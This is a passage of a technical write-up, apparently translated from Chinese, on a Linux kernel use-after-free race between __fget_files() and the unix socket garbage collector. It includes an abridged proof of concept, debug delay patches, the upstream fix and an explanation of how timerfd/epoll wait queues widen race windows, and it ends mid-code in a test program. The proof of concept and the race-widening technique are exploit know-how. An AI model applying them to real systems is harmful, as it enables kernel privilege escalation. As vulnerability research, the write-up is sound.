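<li>Line 43 runs <code>unix_gc()</code> while <code>__fget_files()</code> is still stalled, so the GC reads <code>file_count()</code> before <code>dup()</code> increments it. Just before it builds the hitlist and frees the <code>skb</code>, the GC is itself delayed, which gives the <code>dup()</code> on line 11 time to complete</li>
<li>After <code>dup()</code> returns, the thread reaches <code>recvmsg()</code> on line 16, which peeks the <code>skb</code> and is then delayed while the <code>unix_gc()</code> triggered by line 43 frees that <code>skb</code></li>
<li>Once <code>unix_gc()</code> is done, <code>recvmsg()</code> resumes with the <code>skb</code> that has already been freed: a use-after-free (UAF)</li>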
</ul>
<p>Abridged <a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=2247" target="_blank" rel="noopener">POC</a>:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> <span class="function"><span class="keyword">void</span> <span class="title">send_fd</span><span class="params">(<span class="keyword">int</span> sock, <span class="keyword">int</span> fd)</span> </span>{</span><br><span class="line"><span class="number">2</span> ...</span><br><span class="line"><span class="number">3</span> 
sendmsg(sock, &msg, <span class="number">0</span>);</span><br><span class="line"><span class="number">4</span> }</span><br><span class="line"><span class="number">5</span></span><br><span class="line"><span class="number">6</span> <span class="keyword">int</span> resurrect_fd = <span class="number">-1</span>;</span><br><span class="line"><span class="number">7</span> <span class="keyword">int</span> resurrected_fd = <span class="number">-1</span>;</span><br><span class="line"><span class="number">8</span></span><br><span class="line"><span class="number">9</span> <span class="function"><span class="keyword">void</span> *<span class="title">resurrect_fn</span><span class="params">(<span class="keyword">void</span> *arg)</span> </span>{</span><br><span class="line"><span class="number">10</span> prctl(PR_SET_NAME, <span class="string">"SLOW-ME"</span>); <span class="comment">// tell kernel to inject mdelay()</span></span><br><span class="line"><span class="number">11</span> resurrected_fd = dup(resurrect_fd);</span><br><span class="line"><span class="number">12</span> prctl(PR_SET_NAME, <span class="string">"resurrect"</span>);</span><br><span class="line"><span class="number">13</span></span><br><span class="line"><span class="number">14</span> prctl(PR_SET_NAME, <span class="string">"SLOW-RECV"</span>);</span><br><span class="line"><span class="number">15</span> ...</span><br><span class="line"><span class="number">16</span> <span class="keyword">int</span> recv_bytes = recvmsg(resurrected_fd, &msg, MSG_DONTWAIT);</span><br><span class="line"><span class="number">17</span> prctl(PR_SET_NAME, <span class="string">"resurrect"</span>);</span><br><span class="line"><span class="number">18</span></span><br><span class="line"><span class="number">19</span> <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line"><span class="number">20</span> }</span><br><span class="line"><span class="number">21</span></span><br><span 
class="line"><span class="number">22</span> <span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span> </span>{</span><br><span class="line"><span class="number">23</span> <span class="comment">/* create socketpair */</span></span><br><span class="line"><span class="number">24</span> <span class="keyword">int</span> pair[<span class="number">2</span>];</span><br><span class="line"><span class="number">25</span> socketpair(AF_UNIX, SOCK_STREAM, <span class="number">0</span>, pair);</span><br><span class="line"><span class="number">26</span></span><br><span class="line"><span class="number">27</span> send_fd(pair[<span class="number">1</span>], pair[<span class="number">0</span>]);</span><br><span class="line"><span class="number">28</span></span><br><span class="line"><span class="number">29</span> <span class="keyword">int</span> trigger_sock = socket(AF_UNIX, SOCK_DGRAM, <span class="number">0</span>);</span><br><span class="line"><span class="number">30</span></span><br><span class="line"><span class="number">31</span> resurrect_fd = pair[<span class="number">0</span>];</span><br><span class="line"><span class="number">32</span></span><br><span class="line"><span class="number">33</span> <span class="keyword">pthread_t</span> resurrect_thread;</span><br><span class="line"><span class="number">34</span> pthread_create(&resurrect_thread, <span class="literal">NULL</span>, resurrect_fn, <span class="literal">NULL</span>);</span><br><span class="line"><span class="number">35</span></span><br><span class="line"><span class="number">36</span> usleep(<span class="number">100000</span>); <span class="comment">/* wait for fget_raw() to see pointer */</span></span><br><span class="line"><span class="number">37</span> <span class="built_in">close</span>(pair[<span class="number">0</span>]);</span><br><span class="line"><span class="number">38</span></span><br><span class="line"><span 
class="number">39</span> <span class="comment">/*</span></span><br><span class="line"><span class="comment">40 * trigger unix GC; has to read file_count() before file inc</span></span><br><span class="line"><span class="comment">41 * but do hitlist kill after file inc</span></span><br><span class="line"><span class="comment">42 */</span></span><br><span class="line"><span class="number">43</span> <span class="built_in">close</span>(trigger_sock);</span><br><span class="line"><span class="number">44</span></span><br><span class="line"><span class="number">45</span> <span class="comment">/* make sure dup() has really finished */</span></span><br><span class="line"><span class="number">46</span> pthread_join(resurrect_thread, <span class="literal">NULL</span>);</span><br><span class="line"><span class="number">47</span></span><br><span class="line"><span class="number">48</span> }</span><br></pre></td></tr></table></figure>
<p>The <a href="https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=531225" target="_blank" rel="noopener">kernel patch</a> adds three <code>mdelay(500)</code> calls:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">@@ <span class="number">-850</span>,<span class="number">6</span> +<span class="number">852</span>,<span class="number">13</span> @@ <span class="keyword">static</span> <span class="class"><span class="keyword">struct</span> <span class="title">file</span> *__<span class="title">fget_files</span>(<span class="title">struct</span> <span class="title">files_struct</span> *<span class="title">files</span>, <span class="title">unsigned</span> <span class="title">int</span> <span class="title">fd</span>,</span></span><br><span class="line"><span class="class"> <span class="title">loop</span>:</span></span><br><span class="line"> file = files_lookup_fd_rcu(files, fd);</span><br><span class="line"> <span class="keyword">if</span> (file) {</span><br><span class="line">+ <span class="keyword">if</span> 
(<span class="built_in">strcmp</span>(current->comm, <span class="string">"SLOW-ME"</span>) == <span class="number">0</span>) {</span><br><span class="line">+ pr_warn(<span class="string">"slowing lookup of fd %u to file 0x%lx with %ld refs\n"</span>,</span><br><span class="line">+ fd, (<span class="keyword">unsigned</span> <span class="keyword">long</span>)file, file_count(file));</span><br><span class="line">+ mdelay(<span class="number">500</span>);</span><br><span class="line">+ pr_warn(<span class="string">"slowed lookup of fd %u to file 0x%lx with %ld refs\n"</span>,</span><br><span class="line">+ fd, (<span class="keyword">unsigned</span> <span class="keyword">long</span>)file, file_count(file));</span><br><span class="line">+ }</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line">@@ <span class="number">-2631</span>,<span class="number">6</span> +<span class="number">2633</span>,<span class="number">12</span> @@ <span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">unix_stream_read_generic</span><span class="params">(struct unix_stream_read_state *state,</span></span></span><br><span class="line"><span class="function"><span class="params"> last = skb = skb_peek(&sk->sk_receive_queue);</span></span></span><br><span class="line"><span class="function"><span class="params"> last_len = last ? last->len : <span class="number">0</span>;</span></span></span><br><span class="line"><span class="function"><span class="params"> </span></span></span><br><span class="line"><span class="function"><span class="params">+ <span class="keyword">if</span> (<span class="built_in">strcmp</span>(current->comm, <span class="string">"SLOW-RECV"</span>) == <span class="number">0</span>) {</span></span></span><br><span class="line"><span class="function"><span class="params">+ pr_warn(<span class="string">"recvmsg: delaying stream receive\n"</span>);</span></span></span><br><span class="line"><span class="function"><span class="params">+ mdelay(<span class="number">500</span>);</span></span></span><br><span class="line"><span class="function"><span class="params">+ pr_warn(<span class="string">"recvmsg: delayed stream receive\n"</span>);</span></span></span><br><span class="line"><span class="function"><span class="params">+ }</span></span></span><br><span class="line"><span class="function"><span class="params">+</span></span></span><br><span class="line"><span class="function"><span class="params">...</span></span></span><br><span class="line"><span class="function"><span class="params">@@ <span class="number">-210</span>,<span class="number">8</span> +<span class="number">212</span>,<span class="number">11</span> @@ <span class="keyword">void</span> unix_gc(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"><span class="params">...</span></span></span><br><span class="line"><span class="function"><span class="params"> skb_queue_head_init(&hitlist);</span></span></span><br><span class="line"><span class="function"><span class="params">+ <span class="keyword">if</span> (<span class="built_in">strcmp</span>(current->comm, <span class="string">"resurrect"</span>) == <span class="number">0</span>) {</span></span></span><br><span class="line"><span class="function"><span class="params">+ pr_warn(<span class="string">"unix: delaying hitlist setup\n"</span>);</span></span></span><br><span class="line"><span class="function"><span class="params">+ mdelay(<span class="number">500</span>);</span></span></span><br><span class="line"><span class="function"><span class="params">+ pr_warn(<span class="string">"unix: hitlist setup delay done\n"</span>);</span></span></span><br><span class="line"><span class="function"><span class="params">+ }</span></span></span><br><span class="line"><span class="function"><span class="params"> list_for_each_entry(u, &gc_candidates, link)</span></span></span><br><span class="line"><span class="function"><span class="params"> scan_children(&u->sk, inc_inflight, &hitlist);</span></span></span><br></pre></td></tr></table></figure>
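<h3 id="fixed-patch-如何-work"><a href="#fixed-patch-如何-work" class="headerlink" title="fixed patch 如何 work ?"></a>How does the fixed <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=054aa8d439b9185d4f5eb9a90282d1ce74772969" target="_blank" rel="noopener">patch</a> work?</h3><ul>
<li>What the patch does: after taking the references, the lookup checks the fd table again. If the <code>struct file</code> has already been removed from the fd table during the race window (<code>files_lookup_fd_raw(files, fd) != file</code>), the <code>f_count</code> increment is rolled back with <code>fput_many</code>, which releases the <code>struct file</code> if the count drops to 0, and the lookup is retried.</li>
</ul>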
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">diff --git a/fs/file.c b/fs/file.c</span><br><span class="line">index <span class="number">8627</span>dacfc4246..ad4a8bf3cf109 <span class="number">100644</span></span><br><span class="line">--- a/fs/file.c</span><br><span class="line">+++ b/fs/file.c</span><br><span class="line">@@ <span class="number">-858</span>,<span class="number">6</span> +<span class="number">858</span>,<span class="number">10</span> @@ loop:</span><br><span class="line"> file = <span class="literal">NULL</span>;</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> (!get_file_rcu_many(file, refs))</span><br><span class="line"> <span class="keyword">goto</span> loop;</span><br><span class="line">+ <span class="keyword">else</span> <span class="keyword">if</span> (files_lookup_fd_raw(files, fd) != file) {</span><br><span class="line">+ fput_many(file, refs);</span><br><span class="line">+ <span class="keyword">goto</span> loop;</span><br><span class="line">+ }</span><br><span class="line"> }</span><br><span class="line"> rcu_read_unlock();</span><br></pre></td></tr></table></figure>
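<p>The pattern behind the fix is to take the reference optimistically, then re-check that the table still points at the same object, and roll back and retry if it does not. It can be modelled in user space with C11 atomics. The sketch below rests on several assumptions. <code>struct obj</code>, <code>slot</code>, <code>obj_get_many_not_zero</code>, <code>obj_put_many</code> and <code>obj_lookup_many</code> are hypothetical names. There is no RCU, and freeing is simulated with a flag. It is not the kernel's own code.</p>

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical refcounted object standing in for struct file. */
struct obj {
    atomic_long refs;   /* plays the role of f_count */
    bool freed;         /* set instead of really freeing memory */
};

/* Hypothetical one-entry "fd table". */
static _Atomic(struct obj *) slot;

/* Like get_file_rcu_many(): add n refs only if the count is non-zero. */
static bool obj_get_many_not_zero(struct obj *o, long n)
{
    long old = atomic_load(&o->refs);
    while (old != 0) {
        /* On failure, old is reloaded with the current count. */
        if (atomic_compare_exchange_weak(&o->refs, &old, old + n))
            return true;
    }
    return false;
}

/* Like fput_many(): drop n refs and "free" the object at zero. */
static void obj_put_many(struct obj *o, long n)
{
    if (atomic_fetch_sub(&o->refs, n) == n)
        o->freed = true;
}

/* Lookup with the re-check that the patch adds. Assumes whoever removes
 * an object clears the slot before dropping its own reference. */
static struct obj *obj_lookup_many(long n)
{
    for (;;) {
        struct obj *o = atomic_load(&slot);
        if (!o)
            return NULL;
        if (!obj_get_many_not_zero(o, n))
            continue;                 /* count already hit 0: reload slot */
        if (atomic_load(&slot) != o) {
            obj_put_many(o, n);       /* removed meanwhile: roll back, retry */
            continue;
        }
        return o;                     /* slot still points at o: ref is valid */
    }
}
```

<p>In the kernel, RCU is what keeps <code>file</code> safe to dereference between loading the slot and raising the count. This model sidesteps that question by never actually freeing a <code>struct obj</code>.</p>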
<h2 id="Part-3"><a href="#Part-3" class="headerlink" title="Part.3"></a>Part.3</h2><h3 id="如何利用-hrtimer-扩大-race-成功率?"><a href="#如何利用-hrtimer-扩大-race-成功率?" class="headerlink" title="如何利用 hrtimer 扩大 race 成功率?"></a>How can hrtimers raise the race success rate?</h3><ul>
<li><code>timerfd_create</code> + <code>timerfd_settime</code> can fire a timer interrupt at a chosen point in time, specified in nanoseconds</li>
<li>The timer interrupt handler calls <code>__wake_up_common</code>, which walks the wait queue and runs each entry's callback. The longer the wait queue, the longer the CPU stays in interrupt context</li>
<li>This can be used to interrupt a process while it is inside the race window, so it cannot make progress until the handler returns, while the process it races against runs on another CPU</li>
</ul>
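<p>The first point above can be shown with a minimal user-space sketch. It arms a one-shot timerfd a given number of nanoseconds in the future, using relative mode (flags = 0), and blocks in <code>read</code> until the timer fires. <code>arm_oneshot_ns</code> is a hypothetical helper name. Error handling is reduced to returning -1.</p>

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stdint.h>
#include <sys/timerfd.h>
#include <time.h>
#include <unistd.h>

/* Hypothetical helper: fire once after `ns` nanoseconds (ns must be > 0,
 * since an all-zero it_value disarms the timer) and return the
 * expiration count read from the timerfd, or -1 on error. */
static int64_t arm_oneshot_ns(long ns)
{
    int fd = timerfd_create(CLOCK_MONOTONIC, 0);
    if (fd < 0)
        return -1;

    struct itimerspec its = {0};               /* it_interval = 0: one-shot */
    its.it_value.tv_sec = ns / 1000000000L;
    its.it_value.tv_nsec = ns % 1000000000L;
    if (timerfd_settime(fd, 0, &its, NULL) < 0) {  /* 0: relative timeout */
        close(fd);
        return -1;
    }

    uint64_t expirations = 0;
    /* Blocks until the hrtimer expires and the reader is woken up. */
    ssize_t n = read(fd, &expirations, sizeof(expirations));
    close(fd);
    return n == (ssize_t)sizeof(expirations) ? (int64_t)expirations : -1;
}
```

<p>For example, <code>arm_oneshot_ns(1000000)</code> waits about 1 ms and returns 1, because a one-shot timer expires exactly once.</p>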
<p><strong>Where are wait queue entries added and walked?</strong></p>
<ul>
<li>Each <code>EPOLL_CTL_ADD</code> adds one entry to the timerfd's wait queue, with <code>ep_poll_callback</code> as its callback</li>
<li><code>timerfd_triggered</code> walks the timerfd's wait queue and invokes each entry's callback</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, timer_fds[j], &ev)</span></span><br><span class="line"></span><br><span class="line">do_epoll_ctl()  <span class="comment">// the wait_queue_entry is added in ep_ptable_queue_proc</span></span><br><span class="line">  ep_insert(struct eventpoll *ep, ..</span><br><span class="line">    struct ep_pqueue epq;</span><br><span class="line">    init_poll_funcptr(&epq.pt, ep_ptable_queue_proc);  <span class="comment">// epq.pt._qproc = ep_ptable_queue_proc</span></span><br><span class="line">    ep_item_poll(epi, &epq.pt, <span class="number">1</span>);</span><br><span class="line">      vfs_poll</span><br><span class="line">        timerfd_poll  <span class="comment">// struct file_operations timerfd_fops.poll</span></span><br><span class="line">          struct timerfd_ctx *ctx = file->private_data;</span><br><span class="line">          poll_wait(file, &ctx->wqh, wait);  <span class="comment">// -> pt->_qproc(file, &ctx->wqh, &epq.pt), see include/linux/poll.h</span></span><br><span class="line">            ep_ptable_queue_proc(struct file *file, <span class="keyword">wait_queue_head_t</span> *whead, poll_table *pt)</span><br><span class="line">              struct epitem *epi = ep_item_from_epqueue(pt);</span><br><span class="line">              struct eppoll_entry *pwq;</span><br><span class="line">              ...</span><br><span class="line">              pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL);</span><br><span class="line">              ...</span><br><span class="line">              init_waitqueue_func_entry(&pwq->wait, ep_poll_callback);</span><br><span class="line">              ...</span><br><span class="line">              add_wait_queue(whead, &pwq->wait);  <span class="comment">// whead: &ctx->wqh</span></span><br><span class="line">              ...</span><br><span class="line"></span><br><span class="line">struct ep_pqueue {</span><br><span class="line">  poll_table pt;</span><br><span class="line">  struct epitem *epi;</span><br><span class="line">};</span><br><span class="line"></span><br><span class="line">struct poll_table_struct {</span><br><span class="line">  poll_queue_proc _qproc;  <span class="comment">// void (*)(struct file *, wait_queue_head_t *, struct poll_table_struct *)</span></span><br><span class="line">  <span class="keyword">__poll_t</span> _key;</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">local_apic_timer_interrupt()</span><br><span class="line">  hrtimer_interrupt()</span><br><span class="line">    ...</span><br><span class="line">      timerfd_tmrproc()</span><br><span class="line">        timerfd_triggered()</span><br><span class="line">          spin_lock_irqsave(&ctx->wqh.lock, flags);  <span class="comment">// local interrupts disabled</span></span><br><span class="line">          ctx->expired = <span class="number">1</span>;</span><br><span class="line">          ctx->ticks++;</span><br><span class="line">          wake_up_locked_poll(&ctx->wqh, EPOLLIN);</span><br><span class="line">            __wake_up_common()  <span class="comment">// walks the wait queue and runs every callback</span></span><br><span class="line">              <span class="keyword">wait_queue_entry_t</span> *curr, *next;</span><br><span class="line">              list_for_each_entry_safe_from(curr, next, &wq_head->head, entry)</span><br><span class="line">                ret = curr->func(curr, mode, wake_flags, key);  <span class="comment">// ep_poll_callback</span></span><br><span class="line">          spin_unlock_irqrestore(&ctx->wqh.lock, flags);</span><br></pre></td></tr></table></figure>
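<p>The trace above shows why the interrupt-side cost grows with the number of <code>EPOLL_CTL_ADD</code> registrations. The sketch below is a deliberately simplified user-space model of a wait queue: a circular doubly linked list of entries, each carrying a callback, walked the way <code>__wake_up_common</code> walks <code>wq_head->head</code>. The names <code>wq_entry</code>, <code>wq_head</code>, <code>wq_add</code> and <code>wq_wake_all</code> are hypothetical. The model ignores exclusive waiters and callback return values. The point is only that one wake-up does O(N) work, and in the kernel all of it happens with the wait-queue lock held and interrupts off.</p>

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, simplified stand-in for wait_queue_entry_t. */
struct wq_entry {
    struct wq_entry *prev, *next;
    int (*func)(struct wq_entry *e);  /* like ep_poll_callback */
};

/* Hypothetical stand-in for wait_queue_head_t: a sentinel node. */
struct wq_head {
    struct wq_entry head;
};

static void wq_init(struct wq_head *wq)
{
    wq->head.prev = wq->head.next = &wq->head;
}

/* Like add_wait_queue(): link a new entry right after the sentinel. */
static void wq_add(struct wq_head *wq, struct wq_entry *e)
{
    e->next = wq->head.next;
    e->prev = &wq->head;
    wq->head.next->prev = e;
    wq->head.next = e;
}

static long callbacks_run;

static int count_callback(struct wq_entry *e)
{
    (void)e;
    callbacks_run++;
    return 0;
}

/* Like __wake_up_common(): visit every entry and call its func.
 * Returns the number of entries visited. */
static long wq_wake_all(struct wq_head *wq)
{
    long visited = 0;
    for (struct wq_entry *e = wq->head.next, *next; e != &wq->head; e = next) {
        next = e->next;               /* "_safe" iteration: fetch next first */
        e->func(e);
        visited++;
    }
    return visited;
}
```

<p>With the 500 × 500 registrations used by the test program, a single timer expiry makes 250,000 callback invocations in a row.</p>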
<p><strong><code>timerfd_tmrproc</code> is installed as the hrtimer callback in <code>timerfd_setup</code></strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">timerfd_setup</span><span class="params">(struct timerfd_ctx *ctx, <span class="keyword">int</span> flags,</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="keyword">const</span> struct itimerspec64 *ktmr)</span></span></span><br><span class="line">..</span><br><span class="line"> hrtimer_init(&ctx->t.tmr, clockid, htmode);</span><br><span class="line"> hrtimer_set_expires(&ctx->t.tmr, texp);</span><br><span class="line"> ctx->t.tmr.function = timerfd_tmrproc;</span><br></pre></td></tr></table></figure>
<p><strong>Relationship between <code>struct timerfd_ctx</code>, <code>struct file</code>, and <code>struct hrtimer</code></strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">struct timerfd_ctx *ctx = file->private_data;  <span class="comment">// file -> ctx</span></span><br><span class="line"></span><br><span class="line">struct hrtimer *htmr = &ctx->t.tmr;  <span class="comment">// ctx -> embedded hrtimer</span></span><br><span class="line"></span><br><span class="line">struct timerfd_ctx *ctx = container_of(htmr, struct timerfd_ctx, t.tmr);  <span class="comment">// hrtimer -> ctx, as in timerfd_tmrproc</span></span><br></pre></td></tr></table></figure>
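<p>The last line above relies on <code>container_of</code>. It recovers a pointer to the enclosing structure from a pointer to one of its members by subtracting that member's offset. Below is a minimal user-space version. The types <code>fake_hrtimer</code> and <code>fake_timerfd_ctx</code> are hypothetical stand-ins for the kernel structs, and the kernel's own macro adds compile-time type checking on top of this.</p>

```c
#include <assert.h>
#include <stddef.h>

/* Simplified container_of: member pointer -> enclosing struct pointer. */
#define container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

/* Hypothetical stand-in for struct hrtimer. */
struct fake_hrtimer {
    unsigned long expires;
};

/* Hypothetical stand-in for struct timerfd_ctx: the timer is embedded
 * in a union member named t, mirroring ctx->t.tmr. */
struct fake_timerfd_ctx {
    int clockid;
    union {
        struct fake_hrtimer tmr;
        long alarm_placeholder;
    } t;
    unsigned long ticks;
};

/* What timerfd_tmrproc() does with the hrtimer pointer it receives. */
static struct fake_timerfd_ctx *ctx_from_timer(struct fake_hrtimer *htmr)
{
    return container_of(htmr, struct fake_timerfd_ctx, t.tmr);
}
```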
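<p><strong>Test program:</strong></p>
<p>It adds 500 * 500 = 250,000 entries to the timerfd's wait queue: each of the 500 epoll instances registers all 500 dup'd timerfd descriptors.</p>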
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span 
class="meta-keyword">define</span> _GNU_SOURCE</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><fcntl.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdlib.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><unistd.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/epoll.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/timerfd.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sched.h> </span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><err.h> </span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> SYSCHK(x) ({ \</span></span><br><span class="line"> typeof(x) __res = (x); \</span><br><span class="line"> <span class="keyword">if</span> (__res == (typeof(x))<span class="number">-1</span>) \</span><br><span class="line"> err(<span class="number">1</span>, <span class="string">"SYSCHK("</span> #x <span class="string">")"</span>); \</span><br><span class="line"> __res; \</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> NUM_EPOLL_INSTANCES 500</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> 
